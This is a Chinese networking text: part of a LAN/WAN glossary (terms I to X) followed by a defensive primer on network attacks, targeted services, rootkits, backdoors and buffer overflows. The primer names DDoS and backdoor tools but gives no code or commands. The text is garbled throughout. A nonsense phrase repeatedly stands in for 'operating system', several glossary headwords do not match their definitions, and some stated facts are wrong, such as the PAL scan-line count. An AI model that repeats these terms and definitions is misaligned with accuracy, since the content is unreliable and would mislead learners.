及封装功能。
? Internet Group Management Protocol (互联网分组管理协议, IGMP)—在多点传送中使
用的协议，其中含有接收用户的地址，服务器使用它来通知路由器哪一个工作站属于多
点传送组。
? Internet —Internet 是由许许多多网络设备和多种通信方法链接的成千上万的小型网络
的集合。
下载
? Internet Packet Exchange (网间包交换, IPX)— 由N o v e l l开发的用在它的N e t Wa r e文件
服务器想跳楼作系统上的协议。
? Internet Protocel(Internet 协议， I P )—该协议与T C P或U D P结合使用，通过采用点分
十进制编址，使包到达本地或远程网络上的目标地点。。
? Internet Society (Internet 协会, ISOC)—I S O C是一家非盈利的国际组织，主办会议和
出版物，并监督Internet 标准的执行。
? internetworking (网络互连)—网络互连是将相同或不同类型的网络连接在一起以便相
互通信的过程。
? I n t r a n e t—某个公司组织的私有网络，在该网络中，可以和I n t e r n e t一样使用相同的基
于We b的网络工具，但是对公众的访问有严格的限制。I n t r a n e t通常由一个L A N上的一个
或者多个子网或者V L A N组成。
J
? jamming (阻塞)—交换机使用的一种数据流量控制技术，用来指示由于大量数据引起
的交换机过载。在这种方式中，交换机通过倍增载波信号来模拟冲突。
? jitter (抖动)—抖动是网络上延迟不定的具体表现，抖动会在声频重放时引起明显的错
误，如播放声频时的杂音等。
? Joint Photographic Experts (联合图像专家组, JPEG)压缩—J P E G压缩是使用有失真压
缩技术的压缩标准，由I S O和I T U - T专为静态图像制订

术语表（3）

L
? LAN Emulation (LAN仿真, LANE)—用于使AT M适应于以太网的技术，它创建一个多
点传送的网络，使得预先配置的以太网结点组能够接收传输。
? LAN emulation (局域网仿真)—局域网仿真是一种网络集成方法，用以在相连的L A N
上格式化所有的包以与AT M通信单元(信元)的外型匹配。
? latency (延迟)—延迟是指网络信息从传输设备发送到接收设备所用的时间。
? line-to-line (视线传输)—视线传输是一种无线电信号传输的类型，其中，信号从一点
向另一点传输，而不是在大气中弹跳，从而可以跨越国家或洲的界限。
? local area network (局域网, LAN)—局域网是一系列互连的计算机、打印设备和其他计算
机设备，它们之间共享硬件和软件资源。局域网通常仅限于给定办公地点、楼层或大楼中。
? local bridge (本机桥)—本机桥是连接临近网络的网络设备，可以用来将网络的一部分
分段以缓解网络流量繁忙的问题。
? local management interface extension (局部管理接口扩展)—添加在帧中继帧上的扩展，
可以提供附加的功能，例如多点传送。
? local router (本地路由器)—本地路由器是在同一座大楼或临近的大楼之间(例如在同一
商业区)连接网络的一种路由器。
? Logical link control (逻辑链路控制, LLC)—这是O S I模型的数据链接子层，用来发起
结点间的通信链接，确保链接不会无意识地中断。
? lossy compression (有失真压缩)—有失真压缩是一种压缩图像的方法，它删除一定百
分比的颜色，使得当图像解压缩时，肉眼不会观察到颜色中细微的变化。
? low earth orbiting satellites (低轨卫星, LEO)—一种通信卫星网络，这种通信卫星距离
地面的高度大约在4 3 5到1 0 0 0英里之间。
M
? Management Information Base (管理信息库, MIB)—存储网络性能信息的数据库，该
数据库被存放在网络代理上，可以从网络管理工作站上进行访问。
? Manchester encoding (曼彻斯特编码)—这是一种状态转换编码形式，其中，从低向高
的转换为二进制0，高向低转换为二进制1。
? media access control (介质存取控制, MAC)—这是数据链接层的子层，用来检查网络
帧中包含的地址信息，并控制同一网络上设备共享通信的方式。
? meshed architecture (网络体系)—一种网络体系，其中有多个备用网络路径，如果一
个路径失效，发送设备会自动地重新路由到另外一个路径，不需要用户干预。
? message switching (报文交换)—这种交换方法将数据从一点发送到另一点，每一个中间
结点都可存储数据、等待闲置的传输信道，并在到达目的地后，将数据提交给下一个点。
? metric (度量)—度量是由路由器计算出来的，反映了有关特定传输途径的信息，如路
径长度、下一跳的负载、可用的带宽和路径可靠性等。
? metropolitan area network (城域网, MAN)—城域网是在一大型城市或地区链接多个
L A N的网络。
? Microcom Network Protocol (Microcom网络协议, MNP)—M N P是一套调制解调器的服
务级别，可以提供有效的通信、错误校验、数据压缩和高输入输出总和等能力。
? modem (调制解调器)—调制解调器将计算机输出的数字信号转换为电话线路可以传输
的模拟信号，然后在接收端将输入的模拟信号转换为计算机可以理解的数字信号。
? Moving Open Shortest Path First Protocol (运动图像专家组, MPEG)压缩—M P E G是由
I S O中的M P E G建立的视频压缩标准。
? multicast (多点传送)—一种传输方法，在这种方法中，服务器将需要一个特定多媒体
传输的用户组合成一组。每个数据流只发送一次，但是到达多个地址，而不是分别给每
个地址发送一次数据。
? Multicast Open Shortest Path First Protocol (广播开放最短路径优先协议, MOSPF)—
M O S P F是一种多点广播路由协议，在为多点广播传输寻找从源到目标的最短路径时，
与O S P F相仿。
? multiple system operator(MSO)—这是提供WA N或Internet 服务的一家有线电视公司。
? multiplexer (多路器)—多路器是一种转换器，将一种通信介质分成多个通道，从而结
点可以同时进行通信。当信号被多路传送时，在另一端也必须要多路转换。
? Multiprotocol over ATM (AT M上的多协议, MPOA)—一种通信技术，使得多协议的通
信量能够在AT M上选择路由。
? multistation access unit (多站访问部件, MAU)—M A U是将许多令牌环结点链接到一个
在物理上很像星型结构的拓扑结构上的中央集线器，但在M A U中，包在逻辑上是以环
形结构进行传输的。
302计计局域网/广域网的设计与实现
下载
? multistation access unit (多站访问部件, MAU)—多站访问部件将令牌环结点链接到一
个物理上像星形但数据信号在逻辑的环形上传输的一种拓扑结构上。






N
? National Television Standards Committee (国家电视制式委员会, NTSC)—N T S C是为电
视广播传输建立标准的一个组织。由N T S C制订的电视信号传输标准利用了5 2 5条垂直扫
描线，每秒可传输3 0个帧。
? NetBIOS Extended User Interface (NetBIOS扩展用户接口, NetBEUI)— 由I B M在8 0年
代中期开发，此协议集成了N e t B I O S，用于在网络上进行通信。
? Network Basic Input/Output System (网络基本输入/输出系统, NetBIOS)— 将软件与网
络服务相接口的方法，包括提供为工作站和服务器提供一个网络命名惯例。
? Network Control Protocol (网络控制协议, NCP)—A R PA N E T网络协议，其使用要早于
T C P / I P，但是其功能逐渐被T C P / I P取代。
? Network Device Interface Specification (网络驱动程序接口规范, NDIS)—由微软为网
络驱动器开发的一系列标准，使得一个N I C和一个或多个协议进行通信成为可能。
? Network File System (网络文件系统, NFS)Protocol—T C P / I P文件传输协议，该协议使
用记录流而不是使用成批文件流来传输信息。
? Network Node Interface (网络结点接口, NNI)—一个AT M接口，用于两个AT M交换机
之间的连接，有时候也称为网络到网络的接口。
? network traffic (网络信息流通量)—网络信息流通量是指给定时间内，网络上传输的包
的数量、大小和频率。
? Next Hop Resolution Protocol (下一转发分辨协议, NHRP)— 一个协议，当多个网络通
过AT M连接时，它使得一个网络上的发送结点能够判断出要使用的数据链路层的地址，
以便到达另一个网络上的目标结点。
? Open Database Connectivity (开放数据库互连, ODBC)—由微软开发的一种数据库访问
规则和过程，其目的是作为所有类型的关系数据库的一个标准。
? Open Datalink Interface (开放数据链路接口, ODI)— 由Novell NetWa r e使用的驱动器，
用于在多个网络上传输多个协议。
? Open document Architecture (开放文档体系结构, ODA)—O D A是I S O的标准，是为综
合包含文本、图像、声音和其他表示模式的专门格式化的文档而制订的。
? Open Shortest Path First (开放最短路径优先, OSPF)—开放最短路径优先是路由器采用
的一种路由协议，用来与其他路由器交流有关到其他结点的直接链接等信息。
? Open Systems Interconnection (开放系统互连, OSI)—O S I由I S O和A N S I开发，是一个7
层的模型，为网络上的硬件和软件通信提供一种体制。
术语表计计303
304计计局域网/广域网的设计与实现
下载
? packet (包)—包是为方便在网络上传输而格式化了的数据单元，其中含有与O S I网络
层(即第3层)相应的控制信息及其他信息。
? packet assembler/disassembler (分组组装/拆装器, PA D )—一种将分组封装为X . 2 5格式
并且添加X . 2 5地址信息的设备。当分组到达其目的L A N之后，PA D会把X . 2 5格式信息去
掉。
? packet radio (无线电分组通信)—以短脉冲串的形式通过无线电波传输带有数据的包的
过程。
? packet switching (包交换)—包交换是一种数据传输技术，它在两个传输结点之间建立
起一个逻辑信道，并不停地在许多不同的路径之间发现到达目的地的最好的路由路径。
? partition (分区)—分区即在段的一部分出现故障时关闭电缆段。
? passive hub (无源插孔)—无源插孔是用来以星形拓扑结构连接结点的一种网络传输设
备，当数据信号通过集线器从一个结点传到另一个结点时，不执行信号放大。
? Password Authentication Protocol (口令验证协议, PA P )—当在一个WA N上访问一个服
务器或宿主计算机时，用于验证帐户口令的协议。
? peer protocols (对等协议)—用来使发送结点的O S I模型的各层与相应的接收结点层进
行通信的协议。
? permanent virtual circuit (永久虚拟电路, PVC)—一种通信信道，一直处于连接状态，
不管该结点是否在进行通信。
? phase alternation line (逐行倒相, PA L )—PA L是一种电视传输标准，主要用在非洲、欧
洲、中东和南美洲，它采用了2 5条垂直扫描线，每秒传输2 5帧。
? plain old telephone service (简易老式电话业务, POTS)—规则的语音级电话业务。
? plenum area (高压电缆)—这是一种用特氟纶做套的电缆，由于它在燃烧时不会放射有
毒的气体，所以经常用在高压地区。
? plenum area (高压地区)—高压地区是封闭的地区，其间的大气压要比外界的气压高，
尤其在燃烧时更是如此。建筑物中的高压地区经常可以发展到多个房间或在整个楼层中
蔓延，高压地带包括通风和加热管道。
? Point-to-Point (点到点协议, PPP)— 一个广泛使用的远程通信协议，支持I P X / S P X、
N e t B E U I以及T C P / I P通信。
? power budget (功率分配)—对于光纤电缆通信，功率分配是发送功率和接收器的敏感
性之间的差别，以分贝来衡量。这是信号可以被发送并完好地接受所需要的最小的发送
器功率和接收器敏感性。
? predicted encoding (预测编码)—预测编码是一种视频压缩技术，帧的前一帧具有与其
相同的图像部分，可创建指向这一部分的指针来压缩帧。
? Primary Rate Interface ISDN (ISDN主速率接口, PRI)—I S D N的一种接口，由多个速率
为1 . 5 3 6 M b p s的交换式通信组成。
? primitive (原语)—原语是将O S I协议栈某层的信息传输到另一层(如从物理层传到数据
链接层)的命令。
? Private Network-to-Network Interface(私有网络到网络接口, PNNI)—一个AT M路由选
择协议，最通常使用在与S V C的连接上。
? private automated branch exchange (专用自动交换机, PA B X )—专用自动交换机是一种
专用的自动的电话系统，，但是仍然保留有人工电话总机控制板。
? private branch exchange (专用分组交换机, PBX)—专用分组交换机是一种专用的电话
系统，可以与当地的电话系统相连，也可以不连，它也有一个人工的电话总机控制板。
? private branch exchange (自动用户交换机, PA X )—自动用户交换机是一种完全自动的
(没有电话总机控制板)的专用电话系统。
? promiscuous mode (混合模式)—在混合模式中，在向网络其他连接的段发送帧之前，
网络设备就可以读取帧的目标地址。
? protocol (协议)—协议是人们建立的一套用以指定网络数据如何格式化为包、如何传
输、在接收端如何翻译的标准。
? protocol data unit (协议数据单元, PDU)—在同一个O S I协议栈的各层之间传输的信息。
? Protocol Independent Multicast (协议无关广播, PIM)—协议无关广播是一种多点传送
路由协议，与采用O S P F或R I P为主路由协议的网络兼容。
? public switched telephone network (公用电话交换网络, PSTN)—语音级电话服务。
Q
? Quality of Service (服务质量, QoS)—这是衡量网络传输、质量输入输出总和和可靠性
的手段。

术语表（4）

R
? radio frequency interference (无线电频率干扰, RFI)—因为电气设备发射的无线电波频
率与网络信号传输使用的频率相同而引起的信号干扰为无线电频率干扰，也称射频干
扰。
? R e a l - Time protocol (实时协议, RT P )—实时协议是为实时多媒体应用程序如视频会议
等开发的多点传送协议。
? R e a l - Time Transport Control Protocol (实时传输控制协议, RT C P )—实时传输控制协议
与RT P协同工作，在多点广播传输上提供专门的控制。，如在缺少带宽时，将彩色降级
为单色。RT C P也提供管理信息。
? redirector (转向器)—转向器是一种通过应用层使用的服务，用来识别并访问其他计算
机。
? redundancy (冗余)—提供额外的电缆和设备来保证计算机和计算机系统能够连续地工
作，甚至在一个或多个网络或计算机单元出现故障时仍能正常工作。
? regional Bell operating company, (RBOC)—这是为指定地区提供电话业务的电信公司。
? remote bridge (远程网桥)—远程网桥是穿越同一个城市、在城市之间、在州之间连接
网络以创建一个大网络的设备。
? Remote Network Monitoring (远程网络监控, RMON)—一种利用远程网络结点(例如工
作站或者网络设备)执行网络监控的标准，其功能包括收集信息进行网络协议分析。可
以在网络的远程部分设立监测器，例如中间可以经过一些网桥或者路由器。
? remote router (远程路由器)—远程路由器是跨越极广的地理区域(如城市之间、州之间
和国家之间)将网络连到WA N中的网络设备。
术语表计计305
? repeater (转发器)—转发器是将包放大并重新定时、以让它沿所有连接在转发器上的
输出电缆段发送的网络传输设备。
? Request for Comment (请求注释, RFC)—请求注释是为推动网络互连、Internet 和计算
机通信而发布的信息文档。Internet 工程组( I E T F )负责对R F C进行分类和管理。
? Resource Reservation Protocol (资源预订协议, RSVP)—资源预订协议用于基于T C P / I P
的网络中，可使应用程序能够预订所需要的计算机和网络资源，如带宽、缓冲、最大脉
冲串和服务级别等。R S V P的英文全写为Resource Reservation Protocol ，有时也写作
Resource Reservation Setup Protocol。
? Reverse Address Resolution Protocol(反向地址解析协议, RARP)—一种网络协议，网
络结点上的软件应用或者网络结点本身可以利用该协议确定它自己的I P。
? ring topology (环形拓扑)—在环形拓扑结构中，网络是由数据的连续路径构成的，没
有起始点和终止点，因此也就没有终结器。
? riser cable (上升电缆)—垂直电缆的另一个称呼，指大楼内各楼层间连接用的电缆。
? router (路由器)—路由器是连接访问方法相同或不同的网络的网络设备，如路由器可
以将以太网与令牌环网相连。路由器根据源于网络管理员的路由表数据、发现的最有效
的路由和预编程信息，使用决策进程来向网络提交包。
? Routing Information Protocol (路由信息协议, RIP)—路由信息协议是路由器用来与其
他路由器交流整个路由表的协议。
S
? scan lines (扫描线)—扫描线用来构造电视视频图像。扫描线中含有图像的片面视图，
并从上到下在显示器上显示。在美国，一个电视帧由5 2 5扫描线组成。
? Secure Sockets Layer (加密套接字协议层, SSL)—S S L是一种在服务器和客户端采用的
数字加密技术，例如在客户端的浏览器和Internet 服务器之间可以使用S S L。
? segment (段)—段是符合I E E E规范的一条电缆，如一段1 8 5米长带有3 0个结点(包括终
结器和网络设备)的10Base2 电缆。
? Sequence Packet Exchange (序列包交换, SPX)—一个N o v e l l协议，当对数据可靠性有
特殊要求时，用于应用软件的网络传输。
? serial Line Internet Protocol (串行线路互连网协议, SLIP)— 一个电信网络的WA N协
议，用于在两个电信载波之间建立最快的路由。
? Service data unit (服务数据单元, SDU)—S D U是一种已经在O S I层间进行过转换并删除
了其中的控制信息和转换指令的协议数据单元。
? service level agreement (服务标准协议, SLA)—WA N服务提供商提出的服务标准书面
保证，包括线路必须有效的最小时间。
? shielded twisted-pair cable (屏蔽双绞线, STP)—屏蔽双绞线是一种网络电缆，由绞在
一起的绝缘电线对组成，并包围着一层屏蔽材料，以进行E M I和R F I保护。所有这些都
处在一个保护套管中。
? Simple Network Management (简单网络管理协议, SNMP)—T C P / I P协议套中的一个协
议，计算机或者网络设备可以通过该协议收集关于网络性能的标准化数据。
306计计局域网/广域网的设计与实现
下载
? spanning tree algorithm (生成树算法)—生成树算法是用以确保帧不会无限循环传输的
软件，并可以使帧沿成本最低最有效的网络路径传输。
? spread-spectrum communications (传播光谱技术)—这种通信技术主要用在无线网络
中，在网络间进行高频率通信时可以用它来替代电缆。
? star topology (星形拓扑)—这是最古老的一种网络设计，整个网络是由多个连接在集
线器上的结点构成。
? stateful autoconfiguration (有状态自动配置)—一种利用网络管理软件，基于网络管理
员给出的一组参数自动分配I P地址的技术。
? stateless autoconfiguration (无状态自动配置)—一种分配I P地址的方法，在该方法中，
网络设备自己给自己分配地址。
? state-transition encoding (状态转换编码)—这是一种检验信号状态的改变(如从高到低、
从低到高等)的数字编码方法。
? static routing (静态路由)—静态路由是一种路由进程，包括对网络管理员根据预先调
试的路由指令而做出的路由决定的控制。
? statistical multiple access (统计多路访问)—统计多路访问是根据任务所需分配通信资
源的一种交换方法，例如，给视频文件分配更多的带宽，而给较小的电子表文件分配较
少的带宽。
? store-and-forward switching (存储转发交换)—在存储转发交换技术中，包可以被缓存，
直到完全接收后再发送，并且网络上有一条开放的信道可以发送包。
? streaming (流)—在从网络接收来的M P E G视频文件完全下载之前播放。
? subnet mask (子网模)—子网模(也称子网掩码)是I P地址的某个确定的部分，用于指明
一个网络的地址类别，可以利用它将网络分成子网，以便进行网络流量管理。
? Switched Multimegabit Data Services (交换多兆位数据服务, SMDS)—也叫做交换式兆
位数据服务，是一种由地区电话公司开发的传输方法，利用该技术可以在M A N和WA N
上提供基于信元的高速通信。
? switched virtual circuit (交换虚拟电路, SVC)—为持续的通信会话而创建的一种通信信
道，通常位于可以处理多个信道的介质上。
? synchronous communications (同步通信)—由数据的连续脉冲串进行的通信，而且数
据的连续脉冲串要受每一个脉冲串起始位置的时钟信号控制。
? synchronous communications (异步通信0—异步通信发生离散的单元中，在离散单元
里，单元的开始位置由前面的开始位标示，终止位由单元最后的停止位给出信号。
? synchronous optical network (同步光纤网络, ONET)—一种光纤通信技术，可以进行高
速的数据通信(每秒在兆位以上)。基于S O N E T的网络可以完成语音、数据和视频通信。
? System Network Architecture (系统网络结构, SNA)—系统网络结构是I B M使用的一种
分层通信协议，以便I B M主机和终端进行通信。
? Systeme Electronique Pour Couleur Avec Memoire (顺序与存储彩色电视系统, SECAM)
—顺序与存储彩色电视系统是一种与PA L相似的电视传输标准，但是是用在法国、俄
国和非洲的一些国家。




T
? T-carrier (T载波)—T载波是可用于数据通信的专用电话线路，将两个不同的位置连接
起来，以进行点对点的通信。
? TCP port (TCP端口)—与虚拟电路类似的一种功能，通过T C P端口，位于两个通信结
点或者设备上的单个进程之间可以进行通信。每个通信的进程都有自己的端口号，在有
多个进程同时进行通信的时候，可以使用多个端口。
? telco—地区的电话公司，如US We s t。
? Telecommunications Industry Association (通信工业联合会, TIA)—T I A是E

术语表（5）


I A中的建立
标准的一个实体，主要开发远程通信和布线标准。
? television frame (电视帧)—电视帧是一系列图片中用来模仿动作的一幅完整的图片。
? Te l n e t—一种T C P / I P应用协议，可以提供终端仿真。
? terminal (终端)—终端是具有监视器和键盘的设备，但对本地处理而言是没有C P U的。
终端与主机相连，处理过程均在主机上完成。
? terminal adapter (终端适配器, TA )—终端适配器是将计算机或传真机连接在I S D N线路
上的设备。终端适配器可将数字信号转变为可以在数字电话线路上发送的协议。
? terminal emulation (终端仿真)—用软件来使计算机(如P C )的行为类似于终端。
? time-division multiple access (时分多路访问技术)—这种交换方法通过划分时间槽(每
个时间槽对应一台设备，设备从中可以进行信号传输)使得多个设备可以在同一种通信
介质上进行通信。
? token ring (令牌环)—这是由I B M公司于7 0年代开发的一种访问方法，它仍然保留着主
要的L A N技术。这种传输方法在物理上采用星形拓扑结构，而在逻辑上采用环形拓扑结
构。虽然在令牌环网中，每一个结点也连接在中央集线器上，但包在结点到结点间进行
传输时就好像没有开始点和终止点一样。
? topology (拓扑结构)—拓扑结构是电缆上发送包所遵循的电缆的物理布局和逻辑路径。
? translation (转换)—转换是一种传输协议转变为另一种传输协议的方法。
? translational bridge (转换网桥)—转换网桥是使用不同传输协议的网络间的网桥，它可
以向网络传送适当的不同协议。
? Transmission Control Protocol (传输控制协议, TCP)—这是一种传输协议，属于T C P / I P
协议套的一部分，用于在网络软件应用进程之间建立通信会话，并且可以通过控制数据
流量做到可靠的端到端数据传输。
? Trivial File Transfer Protocol (普通文件传输协议, TFTP)—T C P / I P文件传输协议，用于
传输无盘工作站启动所使用的文件。
? trunking (中继)—在两个网络传输设备之间的两个或多个物理链接，它们组成一个集
合可当做一条线路使用，总的传输速率是每个链接传输速率的总和。
? twisted-pair cable (双绞线)—双绞线是一种柔性通信电缆，其中包含着绞在一起的成
对的绝缘铜线以减少E M I和R F I的干扰，双绞线的外部还覆盖着一层绝缘套管。
下载
? uninterruptible power supply (不间断电源, UPS)—在电源故障或电压不足时，提供快
速电池供电的设备，有时是在一个电子设备中，有时作为一个单独的设备。
? universal serial bus (通用串行总线, U**)—通用串行总线是为连接各种外设(如打印
机、调制解调器、磁带驱动器)而建立的标准，将要替代传统并行和串行端口的使用。
? unshielded twisted-pair cable ( 非屏蔽双绞线, UTP)—这是一种在绞在一起的成对的绝
缘线和外部套管间没有屏蔽的电缆。
? User Datagram Protocol (用户数据报协议, UDP)—一种使用I P的协议，它和T C P的位
置一样，可以提供低开销的无连接服务。
? U s e r-Network Interface(用户—网络接口, UNI)—一个AT M接口，用于终端结点到交换
机的连接。
V
? virtual circuit (虚拟电路)—虚拟电路是由O S I网络层为发送和接收数据而建立的逻辑
通信路径。
? virtual LAN (虚拟局域网, VLAN)—虚拟局域网是在子网组之外建立的逻辑网络，而
子网组是通过交换机和路由器上的智能软件建立并独立于物理网络拓扑结构的。
? virtual path identifier/virtual channel identifier ( 虚拟路径标识符/虚拟通道标识符,
V P I / V C I )— AT M信元中的一个编码，使得信元能够到达想要到达的输出接口。
W
? wavelength division multiplexing (波长分割多路转接器, WDM)—波长分割多路转接器
是一种用于光纤介质的交换技术，可以截取几个输入连接，并将其转化为在光纤电缆上
传送的光谱范围内的不同的波长。
? wide area network (广域网, WA N )—广域网是一种意义深远的网络系统，可以跨越极
大的物理空间。
X
? X . 2 5—一种老的非常可靠的分组交换协议，最高可以以2 . 0 4 8 M b p s的速率连接到远程
的网络上。X . 2 5协议定义了D T E和D C E之间的通信。
? X/Open XA—基于U N I X的系统所使用的一种开放数据库标准。
? Xerox Network System (施乐网络系统, XNS)— 一个由施乐公司在网络早期开发的用
于以太网通信的协议。

网络安全知识（1）

一旦黑客定位了你的网络，他通常会选定一个目标进行渗透。通常这个目标会是安全漏洞最多或是他拥有最多攻击工具的主机。非法入侵系统的方法有很多，你应当对这些方法引起注意。
　　常见攻击类型和特征

　　攻击特征是攻击的特定指纹。入侵监测系统和网络扫描器就是根据这些特征来识别和防范攻击的。下面简要回顾一些特定地攻击渗透网络和主机的方法。

　　常见的攻击方法

　　你也许知道许多常见的攻击方法，下面列出了一些：

　　· 字典攻击：黑客利用一些自动执行的程序猜测用户命和密码，审计这类攻击通常需要做全面的日志记录和入侵监测系统（IDS）。

　　· Man-in-the-middle攻击：黑客从合法的传输过程中嗅探到密码和信息。防范这类攻击的有效方法是应用强壮的加密。

　　· 劫持攻击：在双方进行会话时被第三方（黑客）入侵，黑客黑掉其中一方，并冒充他继续与另一方进行会话。虽然不是个完全的解决方案，但强的验证方法将有助于防范这种攻击。

　　· 病毒攻击：病毒是能够自我复制和传播的小程序，消耗系统资源。在审计过程中，你应当安装最新的反病毒程序，并对用户进行防病毒教育。

　　· 非法服务：非法服务是任何未经同意便运行在你的想跳楼作系统上的进程或服务。你会在接下来的课程中学到这种攻击。

　　· 拒绝服务攻击：利用各种程序（包括病毒和包发生器）使系统崩溃或消耗带宽。

　　容易遭受攻击的目标

　　最常遭受攻击的目标包括路由器、数据库、Web和FTP服务器，和与协议相关的服务，如DNS、WINS和SMB。本课将讨论这些通常遭受攻击的目标。

　　路由器

　　连接公网的路由器由于被暴露在外，通常成为被攻击的对象。许多路由器为便于管理使用SNMP协议，尤其是SNMPv1，成为潜在的问题。许多网络管理员未关闭或加密Telnet会话，若明文传输的口令被截取，黑客就可以重新配置路由器，这种配置包括关闭接口，重新配置路由跳计数等等。物理安全同样值得考虑。必须保证路由器不能被外人物理接触到进行终端会话。

　　过滤Telnet

　　为了避免未授权的路由器访问，你应利用防火墙过滤掉路由器外网的telnet端口和SNMP[161,162]端口

　　技术提示：许多网络管理员习惯于在配置完路由器后将Telnet服务禁止掉，因为路由器并不需要过多的维护工作。如果需要额外的配置，你可以建立物理连接。

　　路由器和消耗带宽攻击

　　最近对Yahoo、e-Bay等电子商务网站的攻击表明迅速重新配置路由器的重要性。这些攻击是由下列分布式拒绝服务攻击工具发起的：

　　· Tribal Flood Network(TFN)

　　· Tribal Flood Network(TFN2k)

　　· Stacheldraht（TFN的一个变种）

　　· Trinoo（这类攻击工具中最早为人所知的）

　　因为许多公司都由ISP提供服务，所以他们并不能直接访问路由器。在你对系统进行审计时，要确保网络对这类消耗带宽式攻击的反映速度。你将在后面的课程中学习如何利用路由器防范拒绝服务攻击。

　　数据库

　　黑客最想得到的是公司或部门的数据库。现在公司普遍将重要数据存储在关系型或面向对象的数据库中，这些信息包括：

　　· 雇员数据，如个人信息和薪金情况。

　　· 市场和销售情况。

　　· 重要的研发信息。

　　· 货运情况。

　　黑客可以识别并攻击数据库。每种数据库都有它的特征。如SQL Server使用1433/1434端口，你应该确保防火墙能够对该种数据库进行保护。你会发现，很少有站点应用这种保护，尤其在网络内部。
服务器安全　　WEB和FTP这两种服务器通常置于DMZ，无法得到防火墙的完全保护，所以也特别容易遭到攻击。Web和FTP服务通常存在的问题包括：

　　· 用户通过公网发送未加密的信息；

　　· 想跳楼作系统和服务存在众所周知的漏洞导致拒绝服务攻击或破坏系统；

　　· 旧有想跳楼作系统中以root权限初始运行的服务，一旦被黑客破坏，入侵者便可以在产生的命令解释器中运行任意的代码。

　　Web页面涂改

　　近来，未经授权对Web服务器进行攻击并涂改缺省主页的攻击活动越来越多。许多企业、政府和公司都遭受过类似的攻击。有时这种攻击是出于政治目的。大多数情况下Web页面的涂改意味着存在这入侵的漏洞。这些攻击通常包括Man-in-the-middle攻击（使用包嗅探器）和利用缓冲区溢出。有时，还包括劫持攻击和拒绝服务攻击。

　　邮件服务

　　广泛使用的SMTP、POP3和IMAP一般用明文方式进行通信。这种服务可以通过加密进行验证但是在实际应用中通信的效率不高。又由于大多数人对多种服务使用相同的密码，攻击者可以利用嗅探器得到用户名和密码，再利用它攻击其它的资源，例如Windows NT服务器。这种攻击不仅仅是针对NT系统。许多不同的服务共享用户名和密码。你已经知道一个薄弱环节可以破坏整个的网络。FTP和SMTP服务通常成为这些薄弱的环节。

　　与邮件服务相关的问题包括：

　　· 利用字典和暴力攻击POP3的login shell；

　　· 在一些版本中sendmail存在缓冲区溢出和其它漏洞；

　　· 利用E-mail的转发功能转发大量的垃圾信件

　　名称服务

　　攻击者通常把攻击焦点集中在DNS服务上。由于DNS使用UDP，而UDP连接又经常被各种防火墙规则所过滤，所以许多系统管理员发现将DNS服务器至于防火墙之后很困难。因此，DNS服务器经常暴露在外，使它成为攻击的目标。DNS攻击包括：
· 未授权的区域传输；

网络安全知识（2）

　· DNS 毒药，这种攻击是指黑客在主DNS服务器向辅DNS服务器进行区域传输时插入错误的DNS信息，一旦成功，攻击者便可以使辅DNS服务器提供错误的名称到IP地址的解析信息；

　　· 拒绝服务攻击；

　　其它的一些名称服务也会成为攻击的目标，如下所示：

　　· WINS，“Coke”通过拒绝服务攻击来攻击没有打补丁的NT系统。

　　· SMB服务（包括Windows的SMB和UNIX的Samba）这些服务易遭受Man-in-the-middle攻击，被捕获的数据包会被类似L0phtCrack这样的程序破解。

　　· NFS和NIS服务。这些服务通常会遭受Man-in-the-middle方式的攻击。

　　在审计各种各样的服务时，请考虑升级提供这些服务的进程。


　　审计系统BUG

　　作为安全管理者和审计人员，你需要对由想跳楼作系统产生的漏洞和可以利用的软件做到心中有数。早先版本的Microsoft IIS允许用户在地址栏中运行命令，这造成了IIS主要的安全问题。其实，最好的修补安全漏洞的方法是升级相关的软件。为了做到这些，你必须广泛地阅读和与其他从事安全工作的人进行交流，这样，你才能跟上最新的发展。这些工作会帮助你了解更多的想跳楼作系统上的特定问题。

　　虽然大多数的厂商都为其产品的问题发布了修补方法，但你必须充分理解补上了哪些漏洞。如果想跳楼作系统或程序很复杂，这些修补可能在补上旧问题的同时又开启了新的漏洞。因此，你需要在实施升级前进行测试。这些测试工作包括在隔离的网段中验证它是否符合你的需求。当然也需要参照值得信赖的网络刊物和专家的观点。

　　审计Trap Door和Root Kit

　　Root kit是用木马替代合法程序。Trap Door是系统上的bug，当执行合法程序时却产生了非预期的结果。如老版本的UNIX sendmail，在执行debug命令时允许用户以root权限执行脚本代码，一个收到严格权限控制的用户可以很轻易的添加用户账户。

　　虽然root kit通常出现在UNIX系统中，但攻击者也可以通过看起来合法的程序在Windows NT中置入后门。象NetBus,BackOrifice和Masters of Paradise等后门程序可以使攻击者渗透并控制系统。木马可以由这些程序产生。如果攻击者够狡猾，他可以使这些木马程序避开一些病毒检测程序，当然用最新升级的病毒检测程序还是可以发现它们的踪迹。在对系统进行审计时，你可以通过校验分析和扫描开放端口的方式来检测是否存在root kit等问题。

　　审计和后门程序

　　通常，在服务器上运行的想跳楼作系统和程序都存在代码上的漏洞。例如，最近的商业Web浏览器就发现了许多安全问题。攻击者通常知道这些漏洞并加以利用。就象你已经知道的RedButton，它利用了Windows NT的漏洞使攻击者可以得知缺省的管理员账号，即使账号的名称已经更改。后门（back door）也指在想跳楼作系统或程序中未记录的入口。程序设计人员为了便于快速进行产品支持有意在系统或程序中留下入口。不同于bug，这种后门是由设计者有意留下的。例如，像Quake和Doom这样的程序含有后门入口允许未授权的用户进入游戏安装的系统。虽然看来任何系统管理员都不会允许类似的程序安装在网络服务器上，但这种情况还是时有发生。

　　从后门程序的危害性，我们可以得出结论，在没有首先阅读资料和向值得信赖的同事咨询之前不要相信任何新的服务或程序。在你进行审计时，请花费一些时间仔细记录任何你不了解它的由来和历史的程序。
　　审计拒绝服务攻击

　　Windows NT 易遭受拒绝服务攻击，主要是由于这种想跳楼作系统比较流行并且没有受到严格的检验。针对NT服务的攻击如此频繁的原因可以归结为：发展势头迅猛但存在许多漏洞。在审计Windows NT网络时，一定要花时间来验证系统能否经受这种攻击的考验。打补丁是一种解决方法。当然，如果能将服务器置于防火墙的保护之下或应用入侵监测系统的话就更好了。通常很容易入侵UNIX想跳楼作系统，主要因为它被设计来供那些技术精湛而且心理健康的人使用。在审计UNIX系统时，要注意Finger服务，它特别容易造成缓冲区溢出。

　　缓冲区溢出

　　缓冲区溢出是指在程序重写内存块时出现的问题。所有程序都需要内存空间和缓冲区来运行。如果有正确的权限，想跳楼作系统可以为程序分配空间。C和C+ +等编程语言容易造成缓冲区溢出，主要因为它们不先检查是否有存在的内存块就直接调用系统内存。一个低质量的程序会不经检查就重写被其它程序占用的内存，而造成程序或整个系统死掉，而留下的shell有较高的权限，易被黑客利用运行任意代码。

